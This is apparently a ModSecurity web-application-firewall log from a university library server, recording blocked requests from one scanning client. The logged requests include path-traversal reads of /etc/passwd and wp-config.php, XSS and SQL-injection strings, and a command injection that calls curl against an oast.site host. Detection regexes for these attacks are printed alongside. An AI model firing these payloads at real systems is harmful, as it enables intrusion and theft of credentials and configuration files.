[Tue Aug 29 11:38:34.479447 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAV1EbIAAAAd"]
[Tue Aug 29 11:38:34.511347 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26g9ya1qtowec8je.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAXK6FAAAAAY"]
[Tue Aug 29 11:38:35.360614 2023] [:error] [pid 1549] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAYNhBgAAAAZ"]
[Tue Aug 29 11:38:46.374206 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAV1EdIAAAAd"]
[Tue Aug 29 11:38:47.382818 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAXxYRQAAAAh"]
[Tue Aug 29 11:38:47.386645 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXYiMYAAAAG"]
[Tue Aug 29 11:38:56.469049 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAXwLLgAAAAe"]
[Tue Aug 29 11:38:57.381583 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAXVyvQAAAAB"]
[Tue Aug 29 11:38:57.400455 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXYiOgAAAAG"]
[Tue Aug 29 11:39:06.647224 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAXwLNkAAAAe"]
[Tue Aug 29 11:39:07.527918 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaJJqwAAAAJ"]
[Tue Aug 29 11:39:11.916481 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12b8Co-f0AAAXbcAsAAAAL"]
[Tue Aug 29 11:39:12.204651 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagExEAAAAn"]
[Tue Aug 29 11:39:12.509536 2023] [:error] [pid 1683] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAaT-vMAAAAb"]
[Tue Aug 29 11:39:13.483695 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAaHMVEAAAAE"]
[Tue Aug 29 11:39:19.407099 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO12d8Co-f0AAAbo-WIAAAAi"]
[Tue Aug 29 11:39:23.491559 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAaW4LkAAAAk"]
[Tue Aug 29 11:39:36.372212 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAXbcHoAAAAL"]
[Tue Aug 29 11:39:48.014082 2023] [:error] [pid 1778] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAby8XEAAAAN"]
[Tue Aug 29 11:39:56.393065 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAcYUy0AAAAp"]
[Tue Aug 29 11:40:01.400562 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gu4b7wpdymfffn.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12ocCo-f0AAAV1Ek0AAAAd"]
[Tue Aug 29 11:40:07.387411 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAcbR7kAAAAv"]
[Tue Aug 29 11:40:07.404408 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcjAgwAAAAw"]
[Tue Aug 29 11:40:07.424732 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO12p8Co-f0AAAcbR7oAAAAv"]
[Tue Aug 29 11:40:12.439307 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAATZp7kAAAAf"]
[Tue Aug 29 11:40:21.430892 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAcPiwIAAAAa"]
[Tue Aug 29 11:40:22.617216 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcjAhoAAAAw"]
[Tue Aug 29 11:40:32.435219 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAYf-HIAAAAD"]
[Tue Aug 29 11:40:33.374941 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAXbcMgAAAAL"]
[Tue Aug 29 11:40:36.566699 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWRwAAAAR"]
[Tue Aug 29 11:40:37.394981 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcqJD8AAAAG"]
[Tue Aug 29 11:40:39.513395 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcVJPoAAAAB"]
[Tue Aug 29 11:40:40.359712 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAcjAkAAAAAw"]
[Tue Aug 29 11:40:44.566664 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAYf-JQAAAAD"]
